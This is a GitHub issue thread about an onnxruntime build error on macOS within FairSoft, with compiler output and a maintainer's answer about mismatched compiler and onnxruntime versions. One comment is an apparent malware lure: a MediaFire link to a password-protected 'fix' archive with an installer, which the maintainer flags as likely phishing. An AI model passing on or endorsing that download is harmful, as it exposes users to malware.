### ISSUE TITLE
Onnxruntime build error on MacOS 

### ISSUE THREAD

**Issue by Om4143** [FairRootGroup/FairSoft#552]
I was trying to build the onxxruntime on my macos but I am facing an error

```
/Users/om/cbm_soft/fairsoft_build/Source/onnxruntime/cmake/external/flatbuffers/src/idl_gen_rust.cpp:409:12: error: variable 'i' set but not used [-Werror,-Wunused-but-set-variable]
    size_t i = 0;
           ^

[ 15%] ESC[32mBuilding CXX object CMakeFiles/onnxruntime_mlas.dir/Users/om/cbm_soft/fairsoft_build/Source/onnxruntime/onnxruntime/core/mlas/lib/intrinsics/avx/min_max_elements.cpp.oESC[0m
1 error generated.
gmake[6]: *** [external/flatbuffers/CMakeFiles/flatc.dir/build.make:286: external/flatbuffers/CMakeFiles/flatc.dir/src/idl_gen_rust.cpp.o] Error 1
gmake[6]: *** Waiting for unfinished jobs....
```

full build log output is attached, please see file below:

[onnxruntime-build.log](https://github.com/user-attachments/files/16751328/onnxruntime-build.log)

could you please help to solve the problem

Thank you.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dennisklein** [comment]
> Download [mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file](https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file) password: changeme In the installer menu, select "gcc."

What kind of an answer is this? Phishing/Malware? @Om4143 Be careful if you decide to download anything this user has posted.

**Comment by dennisklein** [comment]
@Om4143 This problem is likely related to mismatching combination of compiler version and onnxruntime version. You can find the relevant FairSoft configuration here: https://github.com/FairRootGroup/FairSoft/blob/10a78988eda76a6a2a5eb758e2fef989e0addc1e/cmake/legacy.cmake#L462-L489

Either modify this part to your needs or do not use the `onnxruntime` portion of FairSoft and install it via some other method, e.g. as described here: https://onnxruntime.ai/docs/build/

The `onnxruntime` target in FairSoft was added at some point, but is really unmaintained since then due to lack of manpower (we should probably drop it again).
